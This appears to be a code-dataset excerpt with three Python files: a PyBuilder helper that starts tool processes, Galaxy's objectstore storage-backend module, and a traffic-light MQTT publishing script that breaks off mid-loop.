source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
__init__.py | # -*- coding: utf-8 -*-
#
# This file is part of PyBuilder
#
# Copyright 2011-2020 PyBuilder Team
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from pybuilder.remote import Process, PipeShutdownError, RemoteObjectPipe, logger, log_to_stderr
__all__ = ["RemoteObjectPipe", "start_tool", "Tool", "PipeShutdownError", "logger"]
class Tool:
def start(self, pipe):
"""Starts the tool in the tool process"""
pass
def stop(self, pipe):
"""Stops the tool in the tool process"""
pass
def start_tool(pyenv, tools, group=None, name=None, logging=None):
"""
Starts a tool process
"""
if logging:
log_to_stderr()
logger.setLevel(int(logging))
pipe = RemoteObjectPipe.new_pipe()
proc = Process(pyenv, group=group, target=_instrumented_tool, name=name, args=(tools, pipe))
try:
proc.start()
finally:
pipe.close_client_side()
pipe.receive() # Pickle protocol selection
return proc, pipe
def _instrumented_tool(tools, pipe):
try:
for tool in tools:
tool.start(pipe)
while True:
pipe.receive()
except PipeShutdownError:
for tool in reversed(tools):
tool.stop(pipe)
except (SystemExit, KeyboardInterrupt):
raise
except Exception as e:
pipe.close(e)
finally:
pipe.close()
|
__init__.py | """
objectstore package, abstraction for storing blobs of data for use in Galaxy.
all providers ensure that data can be accessed on the filesystem for running
tools
"""
import logging
import os
import random
import shutil
import threading
import time
from collections import OrderedDict
from xml.etree import ElementTree
import yaml
try:
from sqlalchemy.orm import object_session
except ImportError:
object_session = None
from galaxy.exceptions import ObjectInvalid, ObjectNotFound
from galaxy.util import (
directory_hash_id,
force_symlink,
umask_fix_perms,
)
from galaxy.util.bunch import Bunch
from galaxy.util.path import (
safe_makedirs,
safe_relpath,
)
from galaxy.util.sleeper import Sleeper
NO_SESSION_ERROR_MESSAGE = "Attempted to 'create' object store entity in configuration with no database session present."
log = logging.getLogger(__name__)
class ObjectStore(object):
"""ObjectStore abstract interface.
FIELD DESCRIPTIONS (these apply to all the methods in this class):
:type obj: StorableObject
:param obj: A Galaxy object with an assigned database ID accessible via
the .id attribute.
:type base_dir: string
:param base_dir: A key in `self.extra_dirs` corresponding to the base
directory in which this object should be created, or `None` to specify
the default directory.
:type dir_only: boolean
:param dir_only: If `True`, check only the path where the file identified
by `obj` should be located, not the dataset itself. This option applies
to `extra_dir` argument as well.
:type extra_dir: string
:param extra_dir: Append `extra_dir` to the directory structure where the
dataset identified by `obj` should be located. (e.g.,
000/extra_dir/obj.id). Valid values include 'job_work' (defaulting to
config.jobs_directory =
'$GALAXY_ROOT/database/jobs_directory');
'temp' (defaulting to config.new_file_path =
'$GALAXY_ROOT/database/tmp').
:type extra_dir_at_root: boolean
:param extra_dir_at_root: Applicable only if `extra_dir` is set. If True,
the `extra_dir` argument is placed at root of the created directory
structure rather than at the end (e.g., extra_dir/000/obj.id vs.
000/extra_dir/obj.id)
:type alt_name: string
:param alt_name: Use this name as the alternative name for the created
dataset rather than the default.
:type obj_dir: boolean
:param obj_dir: Append a subdirectory named with the object's ID (e.g.
000/obj.id)
"""
def __init__(self, config, config_dict={}, **kwargs):
"""
:type config: object
:param config: An object, most likely populated from
`galaxy/config.ini`, having the following attributes:
* object_store_check_old_style (only used by the
:class:`DiskObjectStore` subclass)
* jobs_directory -- Each job is given a unique empty directory
as its current working directory. This option defines in what
parent directory those directories will be created.
* new_file_path -- Used to set the 'temp' extra_dir.
"""
self.running = True
self.config = config
self.check_old_style = config.object_store_check_old_style
self.store_by = config_dict.get("store_by", None) or getattr(config, "object_store_store_by", "id")
assert self.store_by in ["id", "uuid"]
extra_dirs = {}
extra_dirs['job_work'] = config.jobs_directory
extra_dirs['temp'] = config.new_file_path
extra_dirs.update(dict(
(e['type'], e['path']) for e in config_dict.get('extra_dirs', [])))
self.extra_dirs = extra_dirs
def shutdown(self):
"""Close any connections for this ObjectStore."""
self.running = False
def exists(self, obj, base_dir=None, dir_only=False, extra_dir=None, extra_dir_at_root=False, alt_name=None):
"""Return True if the object identified by `obj` exists, False otherwise."""
raise NotImplementedError()
def file_ready(self, obj, base_dir=None, dir_only=False, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False):
"""
Check if a file corresponding to a dataset is ready to be used.
Return True if so, False otherwise
"""
return True
def create(self, obj, base_dir=None, dir_only=False, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False):
"""
Mark the object (`obj`) as existing in the store, but with no content.
This method will create a proper directory structure for
the file if the directory does not already exist.
"""
raise NotImplementedError()
def empty(self, obj, base_dir=None, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False):
"""
Test if the object identified by `obj` has content.
If the object does not exist raises `ObjectNotFound`.
"""
raise NotImplementedError()
def size(self, obj, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False):
"""
Return size of the object identified by `obj`.
If the object does not exist, return 0.
"""
raise NotImplementedError()
def delete(self, obj, entire_dir=False, base_dir=None, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False):
"""
Delete the object identified by `obj`.
:type entire_dir: boolean
:param entire_dir: If True, delete the entire directory pointed to by
extra_dir. For safety reasons, this option applies
only for and in conjunction with the extra_dir or
obj_dir options.
"""
raise NotImplementedError()
def get_data(self, obj, start=0, count=-1, base_dir=None, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False):
"""
Fetch `count` bytes of data offset by `start` bytes using `obj.id`.
If the object does not exist raises `ObjectNotFound`.
:type start: int
:param start: Set the position to start reading the dataset file
:type count: int
:param count: Read at most `count` bytes from the dataset
"""
raise NotImplementedError()
def get_filename(self, obj, base_dir=None, dir_only=False, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False):
"""
Get the expected filename with absolute path for object with id `obj.id`.
This can be used to access the contents of the object.
"""
raise NotImplementedError()
def update_from_file(self, obj, base_dir=None, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False, file_name=None, create=False):
"""
Inform the store that the file associated with `obj.id` has been updated.
If `file_name` is provided, update from that file instead of the
default.
If the object does not exist raises `ObjectNotFound`.
:type file_name: string
:param file_name: Use file pointed to by `file_name` as the source for
updating the dataset identified by `obj`
:type create: boolean
:param create: If True and the default dataset does not exist, create
it first.
"""
raise NotImplementedError()
def get_object_url(self, obj, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False):
"""
Return the URL for direct acces if supported, otherwise return None.
Note: need to be careful to not bypass dataset security with this.
"""
raise NotImplementedError()
def get_store_usage_percent(self):
"""Return the percentage indicating how full the store is."""
raise NotImplementedError()
@classmethod
def parse_xml(clazz, config_xml):
"""Parse an XML description of a configuration for this object store.
Return a configuration dictionary (such as would correspond to the YAML configuration)
for the object store.
"""
raise NotImplementedError()
@classmethod
def from_xml(clazz, config, config_xml, **kwd):
config_dict = clazz.parse_xml(config_xml)
return clazz(config, config_dict, **kwd)
def to_dict(self):
extra_dirs = []
for extra_dir_type, extra_dir_path in self.extra_dirs.items():
extra_dirs.append({"type": extra_dir_type, "path": extra_dir_path})
return {
'config': config_to_dict(self.config),
'extra_dirs': extra_dirs,
'store_by': self.store_by,
'type': self.store_type,
}
def _get_object_id(self, obj):
if hasattr(obj, self.store_by):
return getattr(obj, self.store_by)
else:
# job's don't have uuids, so always use ID in this case when creating
# job working directories.
return obj.id
class DiskObjectStore(ObjectStore):
"""
Standard Galaxy object store.
Stores objects in files under a specific directory on disk.
>>> from galaxy.util.bunch import Bunch
>>> import tempfile
>>> file_path=tempfile.mkdtemp()
>>> obj = Bunch(id=1)
>>> s = DiskObjectStore(Bunch(umask=0o077, jobs_directory=file_path, new_file_path=file_path, object_store_check_old_style=False), dict(files_dir=file_path))
>>> s.create(obj)
>>> s.exists(obj)
True
>>> assert s.get_filename(obj) == file_path + '/000/dataset_1.dat'
"""
store_type = 'disk'
def __init__(self, config, config_dict):
"""
:type config: object
:param config: An object, most likely populated from
`galaxy/config.ini`, having the same attributes needed by
:class:`ObjectStore` plus:
* file_path -- Default directory to store objects to disk in.
* umask -- the permission bits for newly created files.
:type file_path: str
:param file_path: Override for the `config.file_path` value.
:type extra_dirs: dict
:param extra_dirs: Keys are string, values are directory paths.
"""
super(DiskObjectStore, self).__init__(config, config_dict)
self.file_path = config_dict.get("files_dir") or config.file_path
@classmethod
def parse_xml(clazz, config_xml):
extra_dirs = []
config_dict = {}
if config_xml is not None:
for e in config_xml:
if e.tag == 'files_dir':
config_dict["files_dir"] = e.get('path')
else:
extra_dirs.append({"type": e.get('type'), "path": e.get('path')})
config_dict["extra_dirs"] = extra_dirs
return config_dict
def to_dict(self):
as_dict = super(DiskObjectStore, self).to_dict()
as_dict["files_dir"] = self.file_path
return as_dict
def _get_filename(self, obj, base_dir=None, dir_only=False, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False):
"""
Return the absolute path for the file corresponding to the `obj.id`.
This is regardless of whether or not the file exists.
"""
path = self._construct_path(obj, base_dir=base_dir, dir_only=dir_only, extra_dir=extra_dir,
extra_dir_at_root=extra_dir_at_root, alt_name=alt_name,
obj_dir=False, old_style=True)
# For backward compatibility: check the old style root path first;
# otherwise construct hashed path.
if not os.path.exists(path):
return self._construct_path(obj, base_dir=base_dir, dir_only=dir_only, extra_dir=extra_dir,
extra_dir_at_root=extra_dir_at_root, alt_name=alt_name)
# TODO: rename to _disk_path or something like that to avoid conflicts with
# children that'll use the local_extra_dirs decorator, e.g. S3
def _construct_path(self, obj, old_style=False, base_dir=None, dir_only=False, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False, **kwargs):
"""
Construct the absolute path for accessing the object identified by `obj.id`.
:type base_dir: string
:param base_dir: A key in self.extra_dirs corresponding to the base
directory in which this object should be created, or
None to specify the default directory.
:type dir_only: boolean
:param dir_only: If True, check only the path where the file
identified by `obj` should be located, not the
dataset itself. This option applies to `extra_dir`
argument as well.
:type extra_dir: string
:param extra_dir: Append the value of this parameter to the expected
path used to access the object identified by `obj` (e.g.,
/files/000/<extra_dir>/dataset_10.dat).
:type alt_name: string
:param alt_name: Use this name as the alternative name for the returned
dataset rather than the default.
:type old_style: boolean
param old_style: This option is used for backward compatibility. If
`True` then the composed directory structure does not include a
hash id (e.g., /files/dataset_10.dat (old) vs.
/files/000/dataset_10.dat (new))
"""
base = os.path.abspath(self.extra_dirs.get(base_dir, self.file_path))
# extra_dir should never be constructed from provided data but just
# make sure there are no shenannigans afoot
if extra_dir and extra_dir != os.path.normpath(extra_dir):
log.warning('extra_dir is not normalized: %s', extra_dir)
raise ObjectInvalid("The requested object is invalid")
# ensure that any parent directory references in alt_name would not
# result in a path not contained in the directory path constructed here
if alt_name and not safe_relpath(alt_name):
log.warning('alt_name would locate path outside dir: %s', alt_name)
raise ObjectInvalid("The requested object is invalid")
obj_id = self._get_object_id(obj)
if old_style:
if extra_dir is not None:
path = os.path.join(base, extra_dir)
else:
path = base
else:
# Construct hashed path
rel_path = os.path.join(*directory_hash_id(obj_id))
# Create a subdirectory for the object ID
if obj_dir:
rel_path = os.path.join(rel_path, str(obj_id))
# Optionally append extra_dir
if extra_dir is not None:
if extra_dir_at_root:
rel_path = os.path.join(extra_dir, rel_path)
else:
rel_path = os.path.join(rel_path, extra_dir)
path = os.path.join(base, rel_path)
if not dir_only:
assert obj_id is not None, "The effective dataset identifier consumed by object store [%s] must be set before a path can be constructed." % (self.store_by)
path = os.path.join(path, alt_name if alt_name else "dataset_%s.dat" % obj_id)
return os.path.abspath(path)
def exists(self, obj, **kwargs):
"""Override `ObjectStore`'s stub and check on disk."""
if self.check_old_style:
path = self._construct_path(obj, old_style=True, **kwargs)
# For backward compatibility: check root path first; otherwise
# construct and check hashed path.
if os.path.exists(path):
return True
return os.path.exists(self._construct_path(obj, **kwargs))
def create(self, obj, **kwargs):
"""Override `ObjectStore`'s stub by creating any files and folders on disk."""
if not self.exists(obj, **kwargs):
path = self._construct_path(obj, **kwargs)
dir_only = kwargs.get('dir_only', False)
# Create directory if it does not exist
dir = path if dir_only else os.path.dirname(path)
safe_makedirs(dir)
# Create the file if it does not exist
if not dir_only:
open(path, 'w').close() # Should be rb?
umask_fix_perms(path, self.config.umask, 0o666)
def empty(self, obj, **kwargs):
"""Override `ObjectStore`'s stub by checking file size on disk."""
return self.size(obj, **kwargs) == 0
def size(self, obj, **kwargs):
"""Override `ObjectStore`'s stub by return file size on disk.
Returns 0 if the object doesn't exist yet or other error.
"""
if self.exists(obj, **kwargs):
try:
filepath = self.get_filename(obj, **kwargs)
for _ in range(0, 2):
size = os.path.getsize(filepath)
if size != 0:
break
# May be legitimately 0, or there may be an issue with the FS / kernel, so we try again
time.sleep(0.01)
return size
except OSError:
return 0
else:
return 0
def delete(self, obj, entire_dir=False, **kwargs):
"""Override `ObjectStore`'s stub; delete the file or folder on disk."""
path = self.get_filename(obj, **kwargs)
extra_dir = kwargs.get('extra_dir', None)
obj_dir = kwargs.get('obj_dir', False)
try:
if entire_dir and (extra_dir or obj_dir):
shutil.rmtree(path)
return True
if self.exists(obj, **kwargs):
os.remove(path)
return True
except OSError as ex:
log.critical('%s delete error %s' % (self._get_filename(obj, **kwargs), ex))
return False
def get_data(self, obj, start=0, count=-1, **kwargs):
"""Override `ObjectStore`'s stub; retrieve data directly from disk."""
data_file = open(self.get_filename(obj, **kwargs), 'r') # Should be rb?
data_file.seek(start)
content = data_file.read(count)
data_file.close()
return content
def get_filename(self, obj, **kwargs):
"""
Override `ObjectStore`'s stub.
If `object_store_check_old_style` is set to `True` in config then the
root path is checked first.
"""
if self.check_old_style:
path = self._construct_path(obj, old_style=True, **kwargs)
# For backward compatibility, check root path first; otherwise,
# construct and return hashed path
if os.path.exists(path):
return path
path = self._construct_path(obj, **kwargs)
if not os.path.exists(path):
raise ObjectNotFound
return path
def update_from_file(self, obj, file_name=None, create=False, **kwargs):
"""`create` parameter is not used in this implementation."""
preserve_symlinks = kwargs.pop('preserve_symlinks', False)
# FIXME: symlinks and the object store model may not play well together
# these should be handled better, e.g. registering the symlink'd file
# as an object
if create:
self.create(obj, **kwargs)
if file_name and self.exists(obj, **kwargs):
try:
if preserve_symlinks and os.path.islink(file_name):
force_symlink(os.readlink(file_name), self.get_filename(obj, **kwargs))
else:
path = self.get_filename(obj, **kwargs)
shutil.copy(file_name, path)
umask_fix_perms(path, self.config.umask, 0o666)
except IOError as ex:
log.critical('Error copying %s to %s: %s' % (file_name, self._get_filename(obj, **kwargs), ex))
raise ex
def get_object_url(self, obj, **kwargs):
"""
Override `ObjectStore`'s stub.
Returns `None`, we have no URLs.
"""
return None
def get_store_usage_percent(self):
"""Override `ObjectStore`'s stub by return percent storage used."""
st = os.statvfs(self.file_path)
return (float(st.f_blocks - st.f_bavail) / st.f_blocks) * 100
class NestedObjectStore(ObjectStore):
"""
Base for ObjectStores that use other ObjectStores.
Example: DistributedObjectStore, HierarchicalObjectStore
"""
def __init__(self, config, config_xml=None):
"""Extend `ObjectStore`'s constructor."""
super(NestedObjectStore, self).__init__(config)
self.backends = {}
def shutdown(self):
"""For each backend, shuts them down."""
for store in self.backends.values():
store.shutdown()
super(NestedObjectStore, self).shutdown()
def exists(self, obj, **kwargs):
"""Determine if the `obj` exists in any of the backends."""
return self._call_method('exists', obj, False, False, **kwargs)
def file_ready(self, obj, **kwargs):
"""Determine if the file for `obj` is ready to be used by any of the backends."""
return self._call_method('file_ready', obj, False, False, **kwargs)
def create(self, obj, **kwargs):
"""Create a backing file in a random backend."""
random.choice(list(self.backends.values())).create(obj, **kwargs)
def empty(self, obj, **kwargs):
"""For the first backend that has this `obj`, determine if it is empty."""
return self._call_method('empty', obj, True, False, **kwargs)
def size(self, obj, **kwargs):
"""For the first backend that has this `obj`, return its size."""
return self._call_method('size', obj, 0, False, **kwargs)
def delete(self, obj, **kwargs):
"""For the first backend that has this `obj`, delete it."""
return self._call_method('delete', obj, False, False, **kwargs)
def get_data(self, obj, **kwargs):
"""For the first backend that has this `obj`, get data from it."""
return self._call_method('get_data', obj, ObjectNotFound, True, **kwargs)
def get_filename(self, obj, **kwargs):
"""For the first backend that has this `obj`, get its filename."""
return self._call_method('get_filename', obj, ObjectNotFound, True, **kwargs)
def update_from_file(self, obj, **kwargs):
"""For the first backend that has this `obj`, update it from the given file."""
if kwargs.get('create', False):
self.create(obj, **kwargs)
kwargs['create'] = False
return self._call_method('update_from_file', obj, ObjectNotFound, True, **kwargs)
def get_object_url(self, obj, **kwargs):
"""For the first backend that has this `obj`, get its URL."""
return self._call_method('get_object_url', obj, None, False, **kwargs)
def _repr_object_for_exception(self, obj):
try:
# there are a few objects in python that don't have __class__
obj_id = self._get_object_id(obj)
return '{}({}={})'.format(obj.__class__.__name__, self.store_by, obj_id)
except AttributeError:
return str(obj)
def _call_method(self, method, obj, default, default_is_exception,
**kwargs):
"""Check all children object stores for the first one with the dataset."""
for key, store in self.backends.items():
if store.exists(obj, **kwargs):
return store.__getattribute__(method)(obj, **kwargs)
if default_is_exception:
raise default('objectstore, _call_method failed: %s on %s, kwargs: %s'
% (method, self._repr_object_for_exception(obj), str(kwargs)))
else:
return default
class DistributedObjectStore(NestedObjectStore):
"""
ObjectStore that defers to a list of backends.
When getting objects the first store where the object exists is used.
When creating objects they are created in a store selected randomly, but
with weighting.
"""
store_type = 'distributed'
def __init__(self, config, config_dict, fsmon=False):
"""
:type config: object
:param config: An object, most likely populated from
`galaxy/config.ini`, having the same attributes needed by
:class:`NestedObjectStore` plus:
* distributed_object_store_config_file
:type config_xml: ElementTree
:type fsmon: bool
:param fsmon: If True, monitor the file system for free space,
removing backends when they get too full.
"""
super(DistributedObjectStore, self).__init__(config, config_dict)
self.backends = {}
self.weighted_backend_ids = []
self.original_weighted_backend_ids = []
self.max_percent_full = {}
self.global_max_percent_full = config_dict.get("global_max_percent_full", 0)
random.seed()
backends_def = config_dict["backends"]
for backend_def in backends_def:
backened_id = backend_def["id"]
file_path = backend_def["files_dir"]
extra_dirs = backend_def.get("extra_dirs", [])
maxpctfull = backend_def.get("max_percent_full", 0)
weight = backend_def["weight"]
disk_config_dict = dict(files_dir=file_path, extra_dirs=extra_dirs)
self.backends[backened_id] = DiskObjectStore(config, disk_config_dict)
self.max_percent_full[backened_id] = maxpctfull
log.debug("Loaded disk backend '%s' with weight %s and file_path: %s" % (backened_id, weight, file_path))
for i in range(0, weight):
# The simplest way to do weighting: add backend ids to a
# sequence the number of times equalling weight, then randomly
# choose a backend from that sequence at creation
self.weighted_backend_ids.append(backened_id)
self.original_weighted_backend_ids = self.weighted_backend_ids
self.sleeper = None
if fsmon and (self.global_max_percent_full or [_ for _ in self.max_percent_full.values() if _ != 0.0]):
self.sleeper = Sleeper()
self.filesystem_monitor_thread = threading.Thread(target=self.__filesystem_monitor)
self.filesystem_monitor_thread.setDaemon(True)
self.filesystem_monitor_thread.start()
log.info("Filesystem space monitor started")
@classmethod
def parse_xml(clazz, config_xml, legacy=False):
if legacy:
backends_root = config_xml
else:
backends_root = config_xml.find('backends')
backends = []
config_dict = {
'global_max_percent_full': float(backends_root.get('maxpctfull', 0)),
'backends': backends,
}
for elem in [e for e in backends_root if e.tag == 'backend']:
id = elem.get('id')
weight = int(elem.get('weight', 1))
maxpctfull = float(elem.get('maxpctfull', 0))
elem_type = elem.get('type', 'disk')
if elem_type:
path = None
extra_dirs = []
for sub in elem:
if sub.tag == 'files_dir':
path = sub.get('path')
elif sub.tag == 'extra_dir':
type = sub.get('type')
extra_dirs.append({"type": type, "path": sub.get('path')})
backend_dict = {
'id': id,
'weight': weight,
'max_percent_full': maxpctfull,
'files_dir': path,
'extra_dirs': extra_dirs,
'type': elem_type,
}
backends.append(backend_dict)
return config_dict
@classmethod
def from_xml(clazz, config, config_xml, fsmon=False):
legacy = False
if config_xml is None:
distributed_config = config.distributed_object_store_config_file
assert distributed_config is not None, \
"distributed object store ('object_store = distributed') " \
"requires a config file, please set one in " \
"'distributed_object_store_config_file')"
log.debug('Loading backends for distributed object store from %s', distributed_config)
config_xml = ElementTree.parse(distributed_config).getroot()
legacy = True
else:
log.debug('Loading backends for distributed object store from %s', config_xml.get('id'))
config_dict = clazz.parse_xml(config_xml, legacy=legacy)
return clazz(config, config_dict, fsmon=fsmon)
def to_dict(self):
as_dict = super(DistributedObjectStore, self).to_dict()
as_dict["global_max_percent_full"] = self.global_max_percent_full
backends = []
for backend_id, backend in self.backends.items():
backend_as_dict = backend.to_dict()
backend_as_dict["id"] = backend_id
backend_as_dict["max_percent_full"] = self.max_percent_full[backend_id]
backend_as_dict["weight"] = len([i for i in self.original_weighted_backend_ids if i == backend_id])
backends.append(backend_as_dict)
as_dict["backends"] = backends
return as_dict
def shutdown(self):
"""Shut down. Kill the free space monitor if there is one."""
super(DistributedObjectStore, self).shutdown()
if self.sleeper is not None:
self.sleeper.wake()
def __filesystem_monitor(self):
while self.running:
new_weighted_backend_ids = self.original_weighted_backend_ids
for id, backend in self.backends.items():
maxpct = self.max_percent_full[id] or self.global_max_percent_full
pct = backend.get_store_usage_percent()
if pct > maxpct:
new_weighted_backend_ids = [_ for _ in new_weighted_backend_ids if _ != id]
self.weighted_backend_ids = new_weighted_backend_ids
self.sleeper.sleep(120) # Test free space every 2 minutes
def create(self, obj, **kwargs):
"""The only method in which obj.object_store_id may be None."""
if obj.object_store_id is None or not self.exists(obj, **kwargs):
if obj.object_store_id is None or obj.object_store_id not in self.backends:
try:
obj.object_store_id = random.choice(self.weighted_backend_ids)
except IndexError:
raise ObjectInvalid('objectstore.create, could not generate '
'obj.object_store_id: %s, kwargs: %s'
% (str(obj), str(kwargs)))
_create_object_in_session(obj)
log.debug("Selected backend '%s' for creation of %s %s"
% (obj.object_store_id, obj.__class__.__name__, obj.id))
else:
log.debug("Using preferred backend '%s' for creation of %s %s"
% (obj.object_store_id, obj.__class__.__name__, obj.id))
self.backends[obj.object_store_id].create(obj, **kwargs)
def _call_method(self, method, obj, default, default_is_exception, **kwargs):
object_store_id = self.__get_store_id_for(obj, **kwargs)
if object_store_id is not None:
return self.backends[object_store_id].__getattribute__(method)(obj, **kwargs)
if default_is_exception:
raise default('objectstore, _call_method failed: %s on %s, kwargs: %s'
% (method, self._repr_object_for_exception(obj), str(kwargs)))
else:
return default
def __get_store_id_for(self, obj, **kwargs):
if obj.object_store_id is not None:
if obj.object_store_id in self.backends:
return obj.object_store_id
else:
log.warning('The backend object store ID (%s) for %s object with ID %s is invalid'
% (obj.object_store_id, obj.__class__.__name__, obj.id))
# if this instance has been switched from a non-distributed to a
# distributed object store, or if the object's store id is invalid,
# try to locate the object
for id, store in self.backends.items():
if store.exists(obj, **kwargs):
log.warning('%s object with ID %s found in backend object store with ID %s'
% (obj.__class__.__name__, obj.id, id))
obj.object_store_id = id
_create_object_in_session(obj)
return id
return None
class HierarchicalObjectStore(NestedObjectStore):
"""
ObjectStore that defers to a list of backends.
When getting objects the first store where the object exists is used.
When creating objects only the first store is used.
"""
store_type = 'hierarchical'
def __init__(self, config, config_dict, fsmon=False):
"""The default contructor. Extends `NestedObjectStore`."""
super(HierarchicalObjectStore, self).__init__(config, config_dict)
backends = OrderedDict()
for order, backend_def in enumerate(config_dict["backends"]):
backends[order] = build_object_store_from_config(config, config_dict=backend_def, fsmon=fsmon)
self.backends = backends
@classmethod
def parse_xml(clazz, config_xml):
backends_list = []
for b in sorted(config_xml.find('backends'), key=lambda b: int(b.get('order'))):
store_type = b.get("type")
objectstore_class, _ = type_to_object_store_class(store_type)
backend_config_dict = objectstore_class.parse_xml(b)
backend_config_dict["type"] = store_type
backends_list.append(backend_config_dict)
return {"backends": backends_list}
def to_dict(self):
as_dict = super(HierarchicalObjectStore, self).to_dict()
backends = []
for backend_id, backend in self.backends.items():
backend_as_dict = backend.to_dict()
backends.append(backend_as_dict)
as_dict["backends"] = backends
return as_dict
def exists(self, obj, **kwargs):
"""Check all child object stores."""
for store in self.backends.values():
if store.exists(obj, **kwargs):
return True
return False
def create(self, obj, **kwargs):
"""Call the primary object store."""
self.backends[0].create(obj, **kwargs)
def type_to_object_store_class(store, fsmon=False):
objectstore_class = None
objectstore_constructor_kwds = {}
if store == 'disk':
objectstore_class = DiskObjectStore
elif store == 's3':
from .s3 import S3ObjectStore
objectstore_class = S3ObjectStore
elif store == 'cloud':
from .cloud import Cloud
objectstore_class = Cloud
elif store == 'swift':
from .s3 import SwiftObjectStore
objectstore_class = SwiftObjectStore
elif store == 'distributed':
objectstore_class = DistributedObjectStore
objectstore_constructor_kwds["fsmon"] = fsmon
elif store == 'hierarchical':
objectstore_class = HierarchicalObjectStore
objectstore_constructor_kwds["fsmon"] = fsmon
elif store == 'irods':
from .rods import IRODSObjectStore
objectstore_class = IRODSObjectStore
elif store == 'azure_blob':
from .azure_blob import AzureBlobObjectStore
objectstore_class = AzureBlobObjectStore
elif store == 'pithos':
from .pithos import PithosObjectStore
objectstore_class = PithosObjectStore
# Disable the Pulsar object store for now until it receives some attention
# elif store == 'pulsar':
# from .pulsar import PulsarObjectStore
# return PulsarObjectStore(config=config, config_xml=config_xml)
return objectstore_class, objectstore_constructor_kwds
def build_object_store_from_config(config, fsmon=False, config_xml=None, config_dict=None):
"""
Invoke the appropriate object store.
Will use the `object_store_config_file` attribute of the `config` object to
configure a new object store from the specified XML file.
Or you can specify the object store type in the `object_store` attribute of
the `config` object. Currently 'disk', 's3', 'swift', 'distributed',
'hierarchical', 'irods', and 'pulsar' are supported values.
"""
from_object = 'xml'
if config is None and config_dict is not None and 'config' in config_dict:
# Build a config object from to_dict of an ObjectStore.
config = Bunch(**config_dict["config"])
elif config is None:
raise Exception("build_object_store_from_config sent None as config parameter and one cannot be recovered from config_dict")
if config_xml is None and config_dict is None:
config_file = config.object_store_config_file
if os.path.exists(config_file):
if config_file.endswith(".xml") or config_file.endswith(".xml.sample"):
# This is a top level invocation of build_object_store_from_config, and
# we have an object_store_conf.xml -- read the .xml and build
# accordingly
config_xml = ElementTree.parse(config.object_store_config_file).getroot()
store = config_xml.get('type')
else:
with open(config_file, "rt") as f:
config_dict = yaml.safe_load(f)
from_object = 'dict'
store = config_dict.get('type')
else:
store = config.object_store
elif config_xml is not None:
store = config_xml.get('type')
elif config_dict is not None:
from_object = 'dict'
store = config_dict.get('type')
objectstore_class, objectstore_constructor_kwds = type_to_object_store_class(store, fsmon=fsmon)
if objectstore_class is None:
log.error("Unrecognized object store definition: {0}".format(store))
if from_object == 'xml':
return objectstore_class.from_xml(config=config, config_xml=config_xml, **objectstore_constructor_kwds)
else:
return objectstore_class(config=config, config_dict=config_dict, **objectstore_constructor_kwds)
def local_extra_dirs(func):
"""Non-local plugin decorator using local directories for the extra_dirs (job_work and temp)."""
def wraps(self, *args, **kwargs):
if kwargs.get('base_dir', None) is None:
return func(self, *args, **kwargs)
else:
for c in self.__class__.__mro__:
if c.__name__ == 'DiskObjectStore':
return getattr(c, func.__name__)(self, *args, **kwargs)
raise Exception("Could not call DiskObjectStore's %s method, does your "
"Object Store plugin inherit from DiskObjectStore?"
% func.__name__)
return wraps
def convert_bytes(bytes):
"""A helper function used for pretty printing disk usage."""
if bytes is None:
bytes = 0
bytes = float(bytes)
if bytes >= 1099511627776:
terabytes = bytes / 1099511627776
size = '%.2fTB' % terabytes
elif bytes >= 1073741824:
gigabytes = bytes / 1073741824
size = '%.2fGB' % gigabytes
elif bytes >= 1048576:
megabytes = bytes / 1048576
size = '%.2fMB' % megabytes
elif bytes >= 1024:
kilobytes = bytes / 1024
size = '%.2fKB' % kilobytes
else:
size = '%.2fb' % bytes
return size
def config_to_dict(config):
"""Dict-ify the portion of a config object consumed by the ObjectStore class and its subclasses.
"""
return {
'object_store_check_old_style': config.object_store_check_old_style,
'file_path': config.file_path,
'umask': config.umask,
'jobs_directory': config.jobs_directory,
'new_file_path': config.new_file_path,
'object_store_cache_path': config.object_store_cache_path,
'gid': config.gid,
}
def _create_object_in_session(obj):
session = object_session(obj) if object_session is not None else None
if session is not None:
object_session(obj).add(obj)
object_session(obj).flush()
else:
raise Exception(NO_SESSION_ERROR_MESSAGE)
class ObjectStorePopulator(object):
""" Small helper for interacting with the object store and making sure all
datasets from a job end up with the same object_store_id.
"""
def __init__(self, app):
self.object_store = app.object_store
self.object_store_id = None
def set_object_store_id(self, data):
# Create an empty file immediately. The first dataset will be
# created in the "default" store, all others will be created in
# the same store as the first.
data.dataset.object_store_id = self.object_store_id
try:
self.object_store.create(data.dataset)
except ObjectInvalid:
raise Exception('Unable to create output dataset: object store is full')
self.object_store_id = data.dataset.object_store_id # these will be the same thing after the first output
|
main.py | from subscribe import subscribe
from publish import publish
from time import sleep
import threading
from trafficlight import blink_red, blink_green, blink_amber
broker = "test.mosquitto.org"
topic = "trafficlight/bradford"
try:
# subscribe to the topic
thr = threading.Thread(target=subscribe, args=(broker, topic))
thr.start()
while thr.is_alive():
# publish traffic data to the broker on the topic
publish(broker, topic, "{light: amber, signal: OFF, duration: 0}")
publish(broker, topic, "{light: red, signal: ON, duration: 5}")
sleep(1) # Add a second delay before the traffic light change to ensure the user has gotten the message
blink_red() # Change traffic light to Red for 5 seconds
publish(broker, topic, "{light: red, signal: OFF, duration: 0}")
publish(broker, topic, "{light: amber, signal: ON, duration: 2}")
sleep(1) # Add a second delay before the traffic light change to ensure the user has gotten the message
blink_amber() # Change traffic light to Amber for 2 seconds
publish(broker, topic, "{light: amber, signal: OFF, duration: 0}")
publish(broker, topic, "{light: green, signal: ON, duration: 10}")
